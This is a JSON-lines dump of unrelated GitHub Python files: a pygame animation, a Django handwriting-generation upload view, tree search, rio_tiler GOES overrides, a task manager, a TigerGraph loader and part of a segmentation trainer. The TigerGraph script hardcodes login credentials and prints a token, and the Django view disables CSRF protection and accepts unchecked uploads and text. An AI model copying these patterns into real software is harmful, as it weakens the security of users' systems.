CloudEffectApp:\n    def __init__(self, screen):\n        self.screen = screen\n        self.BLACK = (0, 0, 0)\n        self.particles = [Particle(screen.get_width() // 2, screen.get_height() // 2) for _ in range(200)]\n        self.clock = pygame.time.Clock()\n        self.counter = 1600\n        self.running = True\n\n    def run(self):\n        while self.running:\n            for event in pygame.event.get():\n                if event.type == pygame.QUIT:\n                    self.running = False\n\n            self.screen.fill(self.BLACK)\n\n            for particle in self.particles:\n                particle.move()\n                particle.draw(self.screen)\n\n            pygame.display.flip()\n\n            if self.counter <= 0:\n                self.running = False\n            self.counter -= 1\n            \n            self.clock.tick(170)\n","repo_name":"kdrzazga/python-tutorial","sub_path":"games-anims/demo1/src/cloud_fog.py","file_name":"cloud_fog.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27919045306","text":"from django.shortcuts import render\nfrom django.http.response import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .models import *\nimport sys\nimport json\nsys.path.append('/home/lettf/handwriting_line_generation')\nfrom generate import main as gn\n# Create your views here.\ndef home(request):\n    return render(request, \"home.html\")\n# /home/lettf/handwriting_line_generation/pretrained_weights/IAM_weights/IAMslant_noMask_charSpecSingleAppend_GANMedMT_autoAEMoPrcp2tightNewCTCUseGen_balB_hCF0.75_sMG/checkpoint-iteration175000.pth\n# /home/lettf/lettf/lettf/static/img\n# None\n# None\n# None \n# None\n# image_count=2,path0=./outputs/3.png,path1=./outputs/4.png,path2=./outputs/1.png,text_gen=\"This is Cat\"\n# None\n@csrf_exempt\ndef upload(request):\n    fileList = request.FILES.getlist('files')\n    txt = request.POST['txt']\n    # obj = json.loads(request.body)\n    # txt = obj['txt']\n    print(txt)\n    print(111)\n    file_url = list()\n    for item in fileList:\n        # print(item)\n        image = Image()\n        image.img = item\n        # img = cv2.imread(item,0)\n        # print(item)\n        # project_file.save()\n        image.save()\n        file_url.append(\"/home/lettf/lettf/lettf\"+str(image))\n    print(file_url)\n    file_len = len(fileList)\n    # print(file_len)\n    arg = \"image_count=\"+str(file_len)\n    for f in range(len(file_url)):\n        arg += \",path\"+str(f)+\"=\"+file_url[f]\n    arg+=\",text_gen='\"+txt+\"'\"\n    s = arg.split(',')\n    # print(arg)\n    arguments={}\n    for pair in s:\n        ss = pair.split('=')\n        arguments[ss[0]]=ss[1]\n    print(arguments)\n    text_gen = arguments[\"text_gen\"]\n    print(f\"text_gen : { text_gen }\")\n    img_txt = gn(\"/home/lettf/handwriting_line_generation/pretrained_weights/IAM_weights/IAMslant_noMask_charSpecSingleAppend_GANMedMT_autoAEMoPrcp2tightNewCTCUseGen_balB_hCF0.75_sMG/checkpoint-iteration175000.pth\",\n                \"/home/lettf/lettf/lettf/home/static/img\",\n                arguments=arguments, \n                )\n    # build the TTF: generate every alphabet glyph in the user's handwriting style\n    arg = \"image_count=2\"\n    for f in range(2):\n        arg += \",path\"+str(f)+\"=\"+file_url[f]\n    s = arg.split(',')\n    arguments={}\n    for pair in s:\n        ss = pair.split('=')\n        arguments[ss[0]]=ss[1]\n    alphabets = [f\"{chr(c)} \"+\" \".join([chr(c_) for c_ in (\n        list(range(97, 123)) + list(range(65, 91)))]) for c in (\n        list(range(97, 123)) + list(range(65, 91)))]\n    arguments[\"text_gen\"] = alphabets\n    ttf_txt = gn(\"/home/lettf/handwriting_line_generation/pretrained_weights/IAM_weights/IAMslant_noMask_charSpecSingleAppend_GANMedMT_autoAEMoPrcp2tightNewCTCUseGen_balB_hCF0.75_sMG/checkpoint-iteration175000.pth\",\n                \"/home/lettf/lettf/lettf/home/static/img\",\n                arguments=arguments,\n                alphabets=True \n                )\n    
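# Added comment: bundle both generation results into one JSON payload for the client\n    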
essence = {\n        'img_txt':img_txt,\n        'ttf_txt':ttf_txt\n    }\n    return JsonResponse(essence)","repo_name":"Minhee331/Lettf","sub_path":"lettf/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2838,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"34221683109","text":"'''\n\nGiven a target, return True if it is included in the binary tree and False otherwise.\n\n'''\n\n#from collections import deque\n\n\nclass Node:\n    def __init__(self, val):\n        self.val = val\n        self.left = None\n        self.right = None\n\n\ndef tree_includes(root, target):\n    '''\n    Recursively depth-first search the tree for the target.\n\n    '''\n    if root is None:\n        return False\n    elif root.val == target:\n        return True\n\n    return tree_includes(root.left, target) or tree_includes(root.right, target)\n\n\na = Node(\"a\")\nb = Node(\"b\")\nc = Node(\"c\")\nd = Node(\"d\")\ne = Node(\"e\")\nf = Node(\"f\")\n\na.left = b\na.right = c\nb.left = d\nb.right = e\nc.right = f\n\n# a\n# / \\\n# b c\n# / \\ \\\n# d e f\n\nprint(tree_includes(a, \"e\"))\n","repo_name":"Zarasim/Python_projects","sub_path":"Binary_tree/tree_includes.py","file_name":"tree_includes.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29936477969","text":"# type:ignore\n# flake8:noqa\n\"\"\"Overrides to COG reading by titiler/rio_tiler.\n\nThis file contains workarounds in the form of\noverridden logic in order to make titiler/rio_tiler\nwork in certain cases.\nSpecifically, the GOES thumbnails would not render correctly\ndue to the WarpedVRT not being able to handle errors coming from\nthe custom CRS of those COGs.\n\"\"\"\nimport math\nimport warnings\nfrom typing import Any, Callable, Dict, Optional, Tuple, Union\n\nimport numpy\nfrom rasterio import windows\nfrom rasterio.enums import Resampling\nfrom rasterio.io import DatasetReader, DatasetWriter\nfrom rasterio.vrt import WarpedVRT\nfrom rio_tiler.constants import Indexes, NoData\nfrom rio_tiler.errors import AlphaBandWarning, ExpressionMixingWarning\nfrom rio_tiler.expression import apply_expression, parse_expression\nfrom rio_tiler.io.stac import COGReader\nfrom rio_tiler.models import ImageData\nfrom rio_tiler.utils import non_alpha_indexes\n\n\ndef goes_thumbnail_read(\n    src_dst: Union[DatasetReader, DatasetWriter, WarpedVRT],\n    height: Optional[int] = None,\n    width: Optional[int] = None,\n    indexes: Optional[Indexes] = None,\n    window: Optional[windows.Window] = None,\n    force_binary_mask: bool = True,\n    nodata: Optional[NoData] = None,\n    unscale: bool = False,\n    resampling_method: Resampling = Resampling.nearest,\n    vrt_options: Optional[Dict] = None,\n    post_process: Optional[\n        Callable[[numpy.ndarray, numpy.ndarray], Tuple[numpy.ndarray, numpy.ndarray]]\n    ] = None,\n) -> Tuple[numpy.ndarray, numpy.ndarray]:\n    \"\"\"Low level read function.\n\n    Args:\n        src_dst (rasterio.io.DatasetReader or rasterio.io.DatasetWriter or rasterio.vrt.WarpedVRT): Rasterio dataset.\n        height (int, optional): Output height of the array.\n        width (int, optional): Output width of the array.\n        indexes (sequence of int or int, optional): Band indexes.\n        window (rasterio.windows.Window, optional): Window to read.\n        force_binary_mask (bool, optional): Cast returned mask to binary values (0 or 255). Defaults to `True`.\n        nodata (int or float, optional): Overwrite dataset internal nodata value.\n        unscale (bool, optional): Apply 'scales' and 'offsets' on output data value. 
Defaults to `False`.\n        resampling_method (rasterio.enums.Resampling, optional): Rasterio's resampling algorithm. Defaults to `nearest`.\n        vrt_options (dict, optional): Options to be passed to the rasterio.warp.WarpedVRT class.\n        post_process (callable, optional): Function to apply on output data and mask values.\n\n    Returns:\n        tuple: Data (numpy.ndarray) and Mask (numpy.ndarray) values.\n\n    \"\"\"\n    # OVERRIDE: Set indexes manually so they don't get checked\n    # if isinstance(indexes, int):\n    #     indexes = (indexes,)\n    indexes = (1,)\n\n    vrt_params = dict(add_alpha=True, resampling=Resampling[resampling_method])\n    nodata = nodata if nodata is not None else src_dst.nodata\n    if nodata is not None:\n        vrt_params.update(dict(nodata=nodata, add_alpha=False, src_nodata=nodata))\n\n    # OVERRIDE: Getting the alpha band raises an error on GOES\n    # if has_alpha_band(src_dst):\n    #     vrt_params.update(dict(add_alpha=False))\n\n    if indexes is None:\n        indexes = non_alpha_indexes(src_dst)\n        print(indexes)\n        if indexes != src_dst.indexes:\n            warnings.warn(\n                \"Alpha band was removed from the output data array\", AlphaBandWarning\n            )\n\n    out_shape = (len(indexes), height, width) if height and width else None\n    mask_out_shape = (height, width) if height and width else None\n    resampling = Resampling[resampling_method]\n\n    if vrt_options:\n        vrt_params.update(vrt_options)\n\n    # OVERRIDE - don't use a WarpedVRT or else it fails with GOES.\n    data = src_dst.read(\n        indexes=indexes,\n        window=window,\n        out_shape=out_shape,\n        resampling=resampling,\n    )\n    mask = src_dst.dataset_mask(\n        window=window,\n        out_shape=mask_out_shape,\n        resampling=resampling,\n    )\n\n    if force_binary_mask:\n        mask = numpy.where(mask != 0, numpy.uint8(255), numpy.uint8(0))\n\n    if unscale:\n        data = data.astype(\"float32\", casting=\"unsafe\")\n        numpy.multiply(data, src_dst.scales[0], out=data, casting=\"unsafe\")\n        numpy.add(data, src_dst.offsets[0], out=data, casting=\"unsafe\")\n\n    if post_process:\n        data, mask = post_process(data, mask)\n\n    return data, mask\n\n\ndef goes_thumbnail_preview(\n    src_dst: Union[DatasetReader, DatasetWriter, WarpedVRT],\n    max_size: int = 1024,\n    height: int = None,\n    width: int = None,\n    **kwargs: Any,\n) -> Tuple[numpy.ndarray, numpy.ndarray]:\n    \"\"\"Read decimated version of a dataset.\n\n    Args:\n        src_dst (rasterio.io.DatasetReader or rasterio.io.DatasetWriter or rasterio.vrt.WarpedVRT): Rasterio dataset.\n        max_size (int, optional): Limit output array size if width and height are not set. Defaults to `1024`.\n        height (int, optional): Output height of the array.\n        width (int, optional): Output width of the array.\n        kwargs (optional): Additional options to forward to `rio_tiler.reader.read`.\n\n    Returns:\n        tuple: Data (numpy.ndarray) and Mask (numpy.ndarray) values.\n\n    \"\"\"\n    if not height and not width:\n        if max(src_dst.height, src_dst.width) < max_size:\n            height, width = src_dst.height, src_dst.width\n        else:\n            ratio = src_dst.height / src_dst.width\n            if ratio > 1:\n                height = max_size\n                width = math.ceil(height / ratio)\n            else:\n                width = max_size\n                height = math.ceil(width * ratio)\n\n    return goes_thumbnail_read(src_dst, height, width, **kwargs)\n\n\nclass CustomCOGReader(COGReader):\n    \"\"\"Custom COG reader to work around an issue with GOES projection.\n\n    A hack to get GOES thumbnails to appear, which fail with a \"tolerance error\"\n    when using the default logic. 
For the GOES case this doesn't use a WarpedVRT,\n which avoids that error.\n \"\"\"\n\n def preview_goes(\n self,\n indexes: Optional[Indexes] = None,\n expression: Optional[str] = None,\n **kwargs: Any,\n ) -> ImageData:\n \"\"\"Return a preview of a COG. (Custom hack for GOES)\n\n Args:\n indexes (sequence of int or int, optional): Band indexes.\n expression (str, optional): rio-tiler expression (e.g. b1/b2+b3).\n kwargs (optional): Options to forward to the `rio_tiler.reader.preview` function.\n\n Returns:\n rio_tiler.models.ImageData: ImageData instance with data, mask and input spatial info.\n\n \"\"\"\n kwargs = {**self._kwargs, **kwargs}\n\n if isinstance(indexes, int):\n indexes = (indexes,)\n\n if indexes and expression:\n warnings.warn(\n \"Both expression and indexes passed; expression will overwrite indexes parameter.\",\n ExpressionMixingWarning,\n )\n\n if expression:\n indexes = parse_expression(expression)\n\n data, mask = goes_thumbnail_preview(self.dataset, indexes=indexes, **kwargs)\n\n if expression and indexes:\n blocks = expression.lower().split(\",\")\n bands = [f\"b{bidx}\" for bidx in indexes]\n data = apply_expression(blocks, bands, data)\n\n return ImageData(\n data,\n mask,\n bounds=self.dataset.bounds,\n crs=self.dataset.crs,\n assets=[self.filepath],\n )\n\n def preview(\n self,\n indexes: Optional[Indexes] = None,\n expression: Optional[str] = None,\n **kwargs: Any,\n ) -> ImageData:\n \"\"\"Return a preview of a COG.\n\n Args:\n indexes (sequence of int or int, optional): Band indexes.\n expression (str, optional): rio-tiler expression (e.g. b1/b2+b3).\n kwargs (optional): Options to forward to the `rio_tiler.reader.preview` function.\n\n Returns:\n rio_tiler.models.ImageData: ImageData instance with data, mask and input spatial info.\n\n \"\"\"\n if \"goeseuwest.blob.core.windows.net\" in self.filepath:\n return self.preview_goes(indexes, expression, **kwargs)\n\n return super().preview(indexes, expression, **kwargs)\n","repo_name":"hobu/planetary-computer-apis","sub_path":"pctiler/pctiler/reader_cog.py","file_name":"reader_cog.py","file_ext":"py","file_size_in_byte":8320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"34745178543","text":"from objects.drone import Drone\nfrom objects.waypoint import Waypoint\nfrom objects.mission import Mission\n\ndef is_augmentable(M: Mission, p: Waypoint, drone: Drone, depo: Waypoint) -> bool:\n if M is None or p is None:\n return False\n\n total_energy = p.flying_cost + p.hovering_cost + M.flying_cost + M.hovering_cost\n if len(M.flying_path) > 0:\n total_energy += M.distance_to_depo(depo, p)\n\n\n if total_energy > drone.energy:\n print(total_energy, \"False\")\n return False\n\n if p.data_size + M.data_size > drone.storage:\n print(total_energy, \"False\")\n return False\n\n print(total_energy, \"True\")\n return True\n","repo_name":"kamka427/RSEO-vis","sub_path":"algorithms/is_augmentable.py","file_name":"is_augmentable.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1372301401","text":"from validate import *\r\n\r\nimport csv\r\n\r\n\r\ndef print_main_menu(menu):\r\n \"\"\"\r\n Given a dictionary `menu`,\r\n prints the keys and values as the\r\n formatted options of a menu.\r\n Adds additional prints for decoration\r\n and to output a question\r\n \"What would you like to do?\"\r\n \"\"\"\r\n print(\"**************************\")\r\n print('What would you 
like to do?')\r\n    for key, value in menu.items():\r\n        print(key, '-', value)\r\n    print(\"**************************\")\r\ndef check_option(opt, menu):\r\n    \"\"\"\r\n    Given an option, return \"valid\" if it is\r\n    of type str and is a valid key in\r\n    the provided `menu` collection.\r\n    Otherwise, return \"invalid\".\r\n    \"\"\"\r\n    if type(opt) == str and opt in menu:\r\n        return \"valid\"\r\n    return \"invalid\"\r\n\r\ndef create_a_task(name, description, date, priority, completed):\r\n    '''\r\n    Validate each parameter from \"name\" through \"completed\".\r\n    If one of them fails, return (False, <failed attribute name>),\r\n    e.g. (False, \"name\") if \"name\" is not 3-15 characters long,\r\n    or (False, \"completed\") if completed is not a \"yes\" or \"no\".\r\n    If all validations pass, return (True, <task dictionary>).\r\n    '''\r\n    if validate_name(name) != True:\r\n        return (False, 'name')\r\n    elif validate_description(description) != True:\r\n        return (False, 'description')\r\n    elif validate_date(date) != True:\r\n        return (False, 'deadline')\r\n    elif validate_priority(priority) != True:\r\n        return (False, 'priority')\r\n    elif validate_completed(completed) != True:\r\n        return (False, 'completed')\r\n    else:\r\n        if completed == 'yes' or completed == 'Yes' or completed == 'True':\r\n            completed = True\r\n        else:\r\n            completed = False\r\n        get = {\r\n            'name': name,\r\n            'description': description,\r\n            'deadline': date,\r\n            'priority': int(priority),\r\n            'completed': completed\r\n            \r\n        }\r\n        \r\n        return (True,get)\r\n    \r\n\r\ndef slashes_to_written(date_list):\r\n    \"\"\"\r\n    Convert a date list of the form [month, day, year]\r\n    into a written date string, e.g. ['02', '10', '2021'] -> 'February 10, 2021'\r\n    \"\"\"\r\n    month_names = {\r\n        1: \"January\",\r\n        2: \"February\",\r\n        3: \"March\",\r\n        4: \"April\",\r\n        5: \"May\",\r\n        6: \"June\",\r\n        7: \"July\",\r\n        8: \"August\",\r\n        9: \"September\",\r\n        10: \"October\",\r\n        11: \"November\",\r\n        12: \"December\",\r\n    }\r\n    month = month_names[int(date_list[0])]\r\n    day = str(int(date_list[1]))\r\n    result = f'{month} {day}, {date_list[2]}'\r\n    return result\r\n\r\ndef formatted_completed(completed):\r\n    \"\"\"\r\n    Convert the completed status from a boolean to 'Yes' or 'No'\r\n    \"\"\"\r\n    if completed==True:\r\n        return 'Yes'\r\n    else:\r\n        return 'No'\r\n\r\ndef boolean_completed(completed):\r\n    \"\"\"\r\n    Convert the completed status from 'Yes'/'No' (or a boolean) to a boolean\r\n    \"\"\"\r\n    if completed=='yes' or completed=='Yes' or completed=='True' or completed==True:\r\n        return True\r\n    else:\r\n        return False\r\n\r\ndef formatted_priority(priority):\r\n    \"\"\"\r\n    Convert the numeric priority (1-5) into a descriptive string\r\n    \"\"\"\r\n    if priority==1:\r\n        return 'Lowest'\r\n    elif priority==2:\r\n        return 'Low'\r\n    elif priority==3:\r\n        return 'Medium'\r\n    elif priority==4:\r\n        return 'High'\r\n    else:\r\n        return 'Highest'\r\n\r\n\r\ndef print_formatted_tasks(tasks_list):\r\n    \"\"\"\r\n    Print each task's formatted attributes, one attribute per line\r\n    \"\"\"\r\n    index = 0\r\n    for i in tasks_list:\r\n        print(f\"{index}: {i['name'].upper()}\")\r\n        print(f\" Description: {i['description']}\")\r\n        print(f\" Priority: {formatted_priority(i['priority'])}\")\r\n        print(f\" Deadline: {slashes_to_written(i['deadline'].split('/'))}\")\r\n        print(f\" Completed: {formatted_completed(i['completed'])}\")\r\n        index += 1\r\n    print()\r\n
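\r\n# Usage sketch (added; hypothetical in-memory data):\r\n#   tasks = [{'name': 'Essay', 'description': 'Draft the intro', 'deadline': '02/10/2021',\r\n#             'priority': 3, 'completed': False}]\r\n#   print_formatted_tasks(tasks)   # -> '0: ESSAY', priority 'Medium', 'February 10, 2021'\r\n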
def print_tasks_by_status(all_tasks, completed=False):\r\n    \"\"\" Prints tasks from 'all_tasks', based on the value of 'completed' of each task. \r\n    If there are no tasks that are incomplete, prints 'You do not have incomplete tasks.'\r\n    If there are no tasks that are completed, prints 'You do not have completed tasks.' \r\n    Otherwise, prints the requested tasks. \"\"\"\r\n    c=0\r\n    inc=0\r\n    tasks_listT=[]\r\n    tasks_listF=[]\r\n    if len(all_tasks)==0:\r\n        return None\r\n    for i in all_tasks:\r\n        # 'completed' may be stored as a boolean or as 'Yes'/'yes'; normalize it\r\n        if boolean_completed(i['completed']):\r\n            c+=1\r\n            tasks_listT.append(i)\r\n        else:\r\n            inc+=1\r\n            tasks_listF.append(i)\r\n    if completed==False and c==len(all_tasks):\r\n        print('You do not have incomplete tasks.')\r\n    elif completed==True and inc==len(all_tasks):\r\n        print('You do not have completed tasks.')\r\n    else:\r\n        if completed==False:\r\n            print_formatted_tasks(tasks_listF)\r\n        else:\r\n            print_formatted_tasks(tasks_listT)\r\n        \r\n\r\ndef update_task(task_list,task_id,task_field,task_update):\r\n    \"\"\" \r\n    Update one task in the task list based on the given field.\r\n    If the inputs are valid, the task's content is updated.\r\n    \"\"\"\r\n    fields=[\r\n        'name',\r\n        'description',\r\n        'deadline',\r\n        'priority',\r\n        'completed'\r\n    ]\r\n    if not (is_numeric(task_id) and is_valid_index(task_id, task_list)):\r\n        return (False,'idx')\r\n    \r\n    if check_option(task_field, fields)=='invalid':\r\n        return (False,'field')\r\n    \r\n    if task_field=='name':\r\n        if validate_name(task_update):\r\n            task_list[task_id]['name']=task_update\r\n            return (True,task_list[task_id])\r\n        else:\r\n            return (False,'name')\r\n    elif task_field=='description':\r\n        if validate_description(task_update):\r\n            task_list[task_id]['description']=task_update\r\n            return (True,task_list[task_id])\r\n        else:\r\n            return (False,'description')\r\n    elif task_field=='deadline':\r\n        if validate_date(task_update):\r\n            task_list[task_id]['deadline']=task_update\r\n            return (True,task_list[task_id])\r\n        else:\r\n            return (False,'deadline')  \r\n    elif task_field=='priority':\r\n        if validate_priority(task_update):\r\n            task_list[task_id]['priority']=task_update\r\n            return (True,task_list[task_id])\r\n        else:\r\n            return (False,'priority')  \r\n    elif task_field=='completed':\r\n        if validate_completed(task_update):\r\n            task_list[task_id]['completed']=boolean_completed(task_update)\r\n            return (True,task_list[task_id])\r\n        else:\r\n            return (False,'completed')  \r\n\r\ndef print_sorted_priority(all_tasks):\r\n    \"\"\" \r\n    Print all tasks sorted by priority, highest priority first\r\n    \"\"\"\r\n    newlist = sorted(all_tasks, key=lambda d: d['priority'],reverse=True)\r\n    print_formatted_tasks(newlist)\r\n\r\ndef compare_time(date):\r\n    \"\"\" \r\n    Convert a 'mm/dd/yyyy' date string into a comparable integer,\r\n    e.g. '02/02/2021' -> 20210202,\r\n    so it can be used as a sort key in print_sorted_deadline\r\n    \"\"\"\r\n    date=date.split('/')\r\n    # dates are month/day/year (see slashes_to_written), so compare as year+month+day\r\n    num_date=int(date[2]+date[0]+date[1])\r\n    return num_date\r\n\r\n\r\ndef print_sorted_deadline(all_tasks):\r\n    \"\"\" \r\n    Print all tasks sorted by deadline, closest deadline first\r\n    \"\"\"\r\n    newlist = sorted(all_tasks, key=lambda d: compare_time(d['deadline']))\r\n    print_formatted_tasks(newlist)\r\n\r\ndef delete_task(idx,tasks):\r\n    \"\"\" \r\n    Delete the task at the given index; return True on success\r\n    \"\"\"\r\n    if is_valid_index(idx,tasks):\r\n        tasks.pop(idx)\r\n        return True\r\n    else:\r\n        return False\r\n\r\ndef save_to_csv(my_list,filename):\r\n    \"\"\" \r\n    Save the task list to a CSV file, one task per row \r\n    \"\"\"\r\n    with open(filename,'w',newline='') as myfile:\r\n        task_writer=csv.writer(myfile)\r\n        for i in my_list:\r\n            task_data=list(i.values())\r\n            task_writer.writerow(task_data)\r\n
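\r\n# Round-trip sketch (added; 'tasks.csv' is a hypothetical path):\r\n#   save_to_csv(tasks, 'tasks.csv')\r\n#   tasks_again = load_from_csv('tasks.csv')   # re-validates each row via create_a_task\r\n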
\r\ndef load_from_csv(filename):\r\n    \"\"\" \r\n    Read the CSV file back into a task list, validating each row\r\n    \"\"\"\r\n    my_list=[]\r\n    with open(filename,'r',newline='') as myfile:\r\n        reader_object=csv.reader(myfile)\r\n        for values in reader_object:\r\n            if len(values)==5:\r\n                if values[4]=='True':\r\n                    values[4]='yes'\r\n                else:\r\n                    values[4]='no'\r\n                result=create_a_task(values[0],values[1],values[2],values[3],values[4])\r\n                if result[0]:\r\n                    my_list.append(result[1])\r\n                else:\r\n                    return \"invalid data\"\r\n            else:\r\n                return \"inconsistent format\"\r\n    return my_list\r\n","repo_name":"ZengHaijiang/Project-Management-System","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":8806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"37298456692","text":"import pyTigerGraph as tg  # TigerGraph Python client\nimport pandas as pd\nimport json\n\n\n#for i in countries:\n   # print(str(i)+\" food shortage\")\n\n\n# Create a Connection\nconn = tg.TigerGraphConnection(host=\"https://foodtwit.i.tgcloud.io\", username=\"tigergraph\",\n                               password=\"tigergraph\")\n\nprint(conn.gsql('ls', options=[]))\n\nconn.graphname = \"FOODNEWS3\"\nsecret = conn.createSecret()\nauthToken = conn.getToken(secret)\nauthToken = authToken[0]\nprint(authToken)\n\narticles_file = 'articles.csv'\nresults = conn.uploadFile(articles_file, fileTag='MyDataSource', jobName='load_articles')\nprint(json.dumps(results, indent=2))\n\ntopics_file = 'topics.csv'\nresults=conn.uploadFile(topics_file, fileTag='MyDataSource', jobName='load_topics')\nprint(json.dumps(results, indent=2))\n\ns_file= 'sentiment.csv'\nresults=conn.uploadFile(s_file, fileTag='MyDataSource', jobName='load_sentiment')\nprint(json.dumps(results, indent=2))\n\nl_file = 'labels.csv'\nresults=conn.uploadFile(l_file, fileTag='MyDataSource', jobName='load_labels')\nprint(json.dumps(results, indent=2))\n","repo_name":"rapha18th/foodtwit","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1024054085","text":"import logging\nfrom pathlib import Path\nimport json\nimport pandas as pd\nimport tifffile\nfrom tqdm import tqdm\nimport numpy as np\nimport cv2\nimport torch\nfrom torch.utils.data import DataLoader, RandomSampler, SequentialSampler\nimport torch.optim as optim\nimport torch.optim.swa_utils as swa_utils\n\nimport settings\nimport annotation_utils\nimport visualization\nimport transforms\nimport torch_datasets\nimport torch_modules\nimport torch_utils\nimport metrics\nimport evaluation\nimport test_time_augmentations\n\n\nclass SemanticSegmentationTrainer:\n\n    def __init__(self, dataset_parameters, model_parameters, training_parameters, transform_parameters, inference_parameters, persistence_parameters):\n\n        self.dataset_parameters = dataset_parameters\n        self.model_parameters = model_parameters\n        self.training_parameters = training_parameters\n        self.transform_parameters = transform_parameters\n        self.inference_parameters = inference_parameters\n        self.persistence_parameters = persistence_parameters\n\n    def train(self, train_loader, model, criterion, optimizer, device, scheduler=None):\n\n        \"\"\"\n        Train given model on given data loader\n\n        
Parameters\n ----------\n train_loader (torch.utils.data.DataLoader): Training set data loader\n model (torch.nn.Module): Model to train\n criterion (torch.nn.Module): Loss function\n optimizer (torch.optim.Optimizer): Optimizer\n device (torch.device): Location of the model and inputs\n scheduler (torch.optim.LRScheduler or None): Learning rate scheduler\n\n Returns\n -------\n train_loss (float): Average training loss after model is fully trained on training set data loader\n \"\"\"\n\n model.train()\n progress_bar = tqdm(train_loader)\n losses = []\n\n for inputs, targets in progress_bar:\n inputs, targets = inputs.to(device), targets.to(device)\n optimizer.zero_grad()\n outputs = model(inputs)\n loss = criterion(outputs, targets)\n loss.backward()\n optimizer.step()\n if scheduler is not None:\n scheduler.step()\n losses.append(loss.detach().item())\n average_loss = np.mean(losses)\n lr = scheduler.get_last_lr()[0] if scheduler is not None else optimizer.param_groups[0]['lr']\n progress_bar.set_description(f'train_loss: {average_loss:.6f} - lr: {lr:.8f}')\n\n train_loss = np.mean(losses)\n return train_loss\n\n def validate(self, val_loader, model, criterion, device):\n\n \"\"\"\n Validate given model on given data loader\n\n Parameters\n ----------\n val_loader (torch.utils.data.DataLoader): Validation set data loader\n model (torch.nn.Module): Model to validate\n criterion (torch.nn.Module): Loss function\n device (torch.device): Location of the model and inputs\n\n Returns\n -------\n val_loss (float): Average validation loss after model is fully validated on validation set data loader\n val_dice_coefficients (tuple and float): Validation dice coefficients after model is fully validated on validation set data loader\n val_intersection_over_unions (tuple and float): Validation intersection over unions after model is fully validated on validation set data loader\n \"\"\"\n\n model.eval()\n progress_bar = tqdm(val_loader)\n losses = []\n ground_truth = []\n predictions = []\n\n with torch.no_grad():\n for inputs, targets in progress_bar:\n inputs, targets = inputs.to(device), targets.to(device)\n outputs = model(inputs)\n loss = criterion(outputs, targets)\n losses.append(loss.detach().item())\n average_loss = np.mean(losses)\n progress_bar.set_description(f'val_loss: {average_loss:.6f}')\n ground_truth += [(targets.detach().cpu())]\n predictions += [(outputs.detach().cpu())]\n\n val_loss = np.mean(losses)\n ground_truth = torch.squeeze(torch.cat(ground_truth, dim=0), dim=1)\n predictions = torch.sigmoid(torch.squeeze(torch.cat(predictions, dim=0), dim=1))\n val_dice_coefficients = metrics.mean_binary_dice_coefficient(ground_truth=ground_truth, predictions=predictions, thresholds=self.inference_parameters['label_threshold_range'])\n val_intersection_over_unions = metrics.mean_binary_intersection_over_union(ground_truth=ground_truth, predictions=predictions, thresholds=self.inference_parameters['label_threshold_range'])\n\n return val_loss, val_dice_coefficients, val_intersection_over_unions\n\n def train_and_validate(self, df_train, df_test):\n\n \"\"\"\n Train and validate on inputs and targets listed on given dataframes with specified configuration and transforms\n\n Parameters\n ----------\n df_train (pandas.DataFrame of shape (n_rows, n_columns)): Dataframe of filenames, targets and folds\n df_test (pandas.DataFrame of shape (n_rows, n_columns)): Dataframe of filenames\n \"\"\"\n\n logging.info(f'\\n{\"-\" * 30}\\nRunning {self.persistence_parameters[\"name\"]} Model for Training - 
Seed: {self.training_parameters[\"random_state\"]}\\n{\"-\" * 30}\\n')\n\n # Create directory for models and visualizations\n model_root_directory = Path(settings.MODELS / self.persistence_parameters['name'])\n model_root_directory.mkdir(parents=True, exist_ok=True)\n\n dataset_transforms = transforms.get_semantic_segmentation_transforms(**self.transform_parameters)\n scores = []\n\n for fold in self.training_parameters['folds']:\n\n train_idx, val_idx = df_train.loc[df_train[fold] == 0].index, df_train.loc[df_train[fold] == 1].index\n # Validate on training set if validation is set is not specified\n if len(val_idx) == 0:\n val_idx = train_idx\n\n logging.info(f'\\n{fold} - Training: {len(train_idx)} ({len(train_idx) // self.training_parameters[\"training_batch_size\"] + 1} steps) - Validation {len(val_idx)} ({len(val_idx) // self.training_parameters[\"test_batch_size\"] + 1} steps)')\n train_dataset = torch_datasets.SemanticSegmentationDataset(\n image_paths=df_train.loc[train_idx, self.dataset_parameters['inputs']].values,\n organs=df_train.loc[train_idx, 'organ'].values,\n data_sources=df_train.loc[train_idx, 'data_source'].values,\n masks=df_train.loc[train_idx, 'rle'].values,\n transforms=dataset_transforms['train'],\n imaging_measurement_adaptation_probability=self.transform_parameters['imaging_measurement_adaptation_probability'],\n standardize_luminosity_probability=self.transform_parameters['standardize_luminosity_probability']\n )\n train_loader = DataLoader(\n train_dataset,\n batch_size=self.training_parameters['training_batch_size'],\n sampler=RandomSampler(train_dataset),\n pin_memory=False,\n drop_last=False,\n num_workers=self.training_parameters['num_workers']\n )\n val_dataset = torch_datasets.SemanticSegmentationDataset(\n image_paths=df_train.loc[val_idx, self.dataset_parameters['inputs']].values,\n organs=df_train.loc[val_idx, 'organ'].values,\n data_sources=df_train.loc[val_idx, 'data_source'].values,\n masks=df_train.loc[val_idx, 'rle'].values,\n transforms=dataset_transforms['val'],\n imaging_measurement_adaptation_probability=0,\n standardize_luminosity_probability=0\n )\n val_loader = DataLoader(\n val_dataset,\n batch_size=self.training_parameters['test_batch_size'],\n sampler=SequentialSampler(val_dataset),\n pin_memory=False,\n drop_last=False,\n num_workers=self.training_parameters['num_workers']\n )\n\n # Set model, loss function, device and seed for reproducible results\n torch_utils.set_seed(self.training_parameters['random_state'], deterministic_cudnn=self.training_parameters['deterministic_cudnn'])\n device = 